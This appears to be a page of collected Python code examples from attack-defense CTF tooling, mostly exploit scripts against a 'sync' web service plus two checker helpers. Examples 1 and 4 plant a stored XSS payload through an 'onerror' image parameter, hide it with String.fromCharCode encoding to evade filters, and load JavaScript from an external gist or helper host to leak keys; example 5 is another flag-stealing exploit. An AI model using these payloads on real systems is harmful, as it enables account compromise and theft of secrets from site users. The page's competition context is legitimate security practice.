Пример #1
def leak_key() -> str | None:
    """Exploit driver from an attack-defense checker: plant a stored payload and read the leaked value back.

    Flow, as visible here: register a throw-away account, create a "sync" whose
    ``image_params`` carries an ``onerror`` key, solve the join challenge, then
    poll the ticket endpoint until a ``ticket_url`` appears and run the
    module-level ``regex`` over the fetched ticket body.

    Returns:
        The first ``regex`` match in the ticket page, or ``None`` when the page
        has no match or no ticket shows up within 20 polls (~10 s).

    Relies on module-level names not shown on this page: ``IP``, ``checklib``,
    ``requests``, ``sleep``, ``mine_answer``, ``extract_text`` and ``regex``.
    """
    # Externally hosted JavaScript that the injected <script> tag loads; its contents are not on this page.
    xss_script_url = 'https://gist.githubusercontent.com/jnovikov/7f3d47b45cc8b9696cfe3882cb88f181/raw/4cad1ba6c459fb5c2b86d1b8f15478186c807edc/moim.js'
    # Fresh random credentials so every run uses its own account.
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()

    s = requests.Session()
    # Registration response is not checked; a failure surfaces later as a KeyError on data['id'].
    s.post(f'http://{IP}:8000/api/register',
           json={
               'email': email,
               'password': password
           },
           # NOTE(review): 'Accept-Encoding' names a compression scheme, not a media type;
           # requests already sends Content-Type: application/json for json=, so this
           # header is ineffective rather than harmful.
           headers={'Accept-Encoding': 'application/json'})

    pwn_url = '<script src="{}"></script>'.format(xss_script_url)

    # Re-encode the tag one character at a time as String.fromCharCode(<code>) so the
    # final attribute value contains only letters, digits, '+', ',' and parentheses —
    # no quotes or angle brackets that an attribute context would break on or a naive filter would catch.
    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)

    sploit = 'document.write(' + '+'.join(pwn_code) + ')'

    # NOTE(review): the *key name* 'onerror' is the injection point — a service that copies
    # caller-chosen image_params keys into an <img> tag as attributes emits an event handler.
    # Service-side mitigation is an allow-list of attribute names (width etc.) plus attribute
    # escaping; presumably what a patched service does — confirm against the service code.
    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'hehe',
        'description': 'Totally not an exploit',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }

    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
    data = resp.json()
    sync_id = data['id']
    # Join requires answering a server-issued challenge; mine_answer() is defined elsewhere.
    r = s.get(f'http://{IP}:8000/api/sync/{sync_id}/challenge')
    challenge = r.json().get('challenge')
    resp = s.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
                  json={
                      'nickname': 'asd',
                      'challenge_answer': mine_answer(challenge)
                  })
    public_id = resp.json().get('public_id')
    # Poll up to 20 times, 0.5 s apart, for a ticket_url on the ticket record
    # (presumably produced once the planted handler runs on the victim side — not observable here).
    for _ in range(20):
        sleep(0.5)
        r = s.get(f'http://{IP}:8000/api/ticket/' + public_id)
        ticket_data = r.json()
        ticket_url = ticket_data.get('ticket_url')
        if ticket_url:
            url = f'http://{IP}:8000{ticket_url}'
            resp = s.get(url)

            # extract_text() returns bytes (it is decoded here); undecodable bytes are dropped.
            env_file_data = extract_text(resp).decode('utf-8', 'ignore')
            # regex is a compiled pattern (findall receives only the text).
            matches = regex.findall(env_file_data)
            if len(matches) == 0:
                return None
            return matches[0]
    else:
        # Only reached when all 20 polls completed without a ticket_url.
        print("Failed to leak key. Timeout", flush=True)
        return None
Пример #2
 def register_service(self, password=None):
     """Register a fresh user against ``self.url`` and return its credentials.

     Args:
         password: Password to register with; any falsy value (``None``, ``""``)
             is replaced by a random one from ``checklib``.

     Returns:
         ``(username, password)`` as actually sent to the service.

     Raises:
         Whatever ``checklib.check_response`` raises when the service does not
         answer the registration request successfully.
     """
     # NOTE(review): the service's registerForm is called with GET, so the login and
     # password travel in the query string and will land in access logs and proxies.
     # That is the service's contract, not the checker's choice — this call must mirror it.
     credentials = {
         'login': checklib.rnd_username(),
         'password': password or checklib.rnd_password(),
     }
     r = requests.get(f'{self.url}/registerForm', params=credentials)
     checklib.check_response(r, 'Could not register')
     return credentials['login'], credentials['password']
Пример #3
    def _rnd_slave(self, desc, l, r):
        """Build one random "slave" record to push through the service as checker test data.

        Args:
            desc: Stored verbatim under the "описание" key.
            l: Inclusive lower bound for the random "цена" value.
            r: Inclusive upper bound for the random "цена" value.

        Returns:
            A dict with the three fixed keys plus 0–5 extra entries under random
            5-character keys; each extra is either a random 10-character string
            or a nested dict of 1–3 random 4-char → 15-char string pairs.
        """
        record = {
            "имя": rnd_username(),
            "описание": desc,
            "цена": randint(l, r),
        }

        for _ in range(randint(0, 5)):
            # Draw the shape first, then the key, to keep the random call order fixed.
            nested = randint(0, 1) != 0
            key = rnd_string(5)
            if nested:
                record[key] = dict(
                    (rnd_string(4), rnd_string(15)) for _ in range(randint(1, 3))
                )
            else:
                record[key] = rnd_string(10)

        return record
def leak_key() -> None:
    """Exploit driver variant that reports back to an external helper instead of reading the leak locally.

    Flow, as visible here: register a throw-away account, create a "sync" whose
    ``image_params`` carries an ``onerror`` key pointing at ``helper_url``, then
    join it and print the raw join response. Nothing is returned.

    Relies on module-level names not shown on this page: ``IP``, ``helper_url``,
    ``checklib`` and ``requests``.
    """
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()

    s = requests.Session()
    # Registration response is kept but never checked; a failure surfaces later as a KeyError on data['id'].
    resp = s.post(f'http://{IP}:8000/api/register',
                  json={
                      'email': email,
                      'password': password
                  },
                  # NOTE(review): 'Accept-Encoding' names a compression scheme, not a media type;
                  # requests already sends Content-Type: application/json for json=, so this
                  # header is ineffective rather than harmful.
                  headers={'Accept-Encoding': 'application/json'})

    # The loaded script is served by helper_url (not on this page); the target IP is
    # passed as a query parameter so the helper can attribute the callback to this host.
    pwn_url = f'<script src="{helper_url}/hckk?ip={IP}"></script>'

    # Re-encode the tag one character at a time as String.fromCharCode(<code>) so the
    # final attribute value contains only letters, digits, '+', ',' and parentheses —
    # no quotes or angle brackets.
    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)

    sploit = 'document.write(' + '+'.join(pwn_code) + ')'

    # NOTE(review): the *key name* 'onerror' is the injection point — a service that copies
    # caller-chosen image_params keys into an <img> tag as attributes emits an event handler.
    # Service-side mitigation is an allow-list of attribute names plus attribute escaping —
    # confirm against the service code.
    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'Anime sync!',
        'description': 'Join us at kek on kek',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }

    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)

    data = resp.json()
    sync_id = data['id']

    # Plain requests.post, not the session: the join carries no cookies from the
    # registered account, and no 'challenge_answer' field is sent. Whether the service
    # accepts this anonymously can't be told from here — confirm.
    resp = requests.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id),
                         json={'nickname': 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='})
    print(resp.text, flush=True)
Пример #5
import sys
from checklib import get_initialized_session, rnd_username, rnd_password

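# Flat exploit script: register, log in, create a "code" record and print whatever
# the service hands back under 'ok'. Usage: python <script> <ip>
if len(sys.argv) < 2:
    # Fail with a usage line instead of an IndexError traceback when the target is missing.
    sys.exit(f"usage: {sys.argv[0]} <ip>")
ip = sys.argv[1]
PORT = 6091

url = f"http://{ip}:{PORT}/api"

s = get_initialized_session()
# Fresh random credentials so every run uses its own account.
u, p = rnd_username(), rnd_password()

# NOTE(review): the 'home' value is the only non-random field sent here; presumably
# this is the input the service fails to validate — confirm against the service.
s.post(f"{url}/register/",
       json={
           'username': u,
           'password': p,
           'home': 'evilhacker',
       })

# Login establishes the session cookie the following calls rely on.
s.post(f"{url}/login/", json={
    'username': u,
    'password': p,
})

# Responses are not checked; a failed create/login surfaces as a KeyError on ['ok'].
cid = s.post(f"{url}/code/", json={'work': 'work', 'code': []}).json()['ok']

# The 'ok' field of the record read-back is iterated and printed one element per line.
flags = s.get(f"{url}/code/{cid}/").json()['ok']

for i in flags:
    print(i, flush=True)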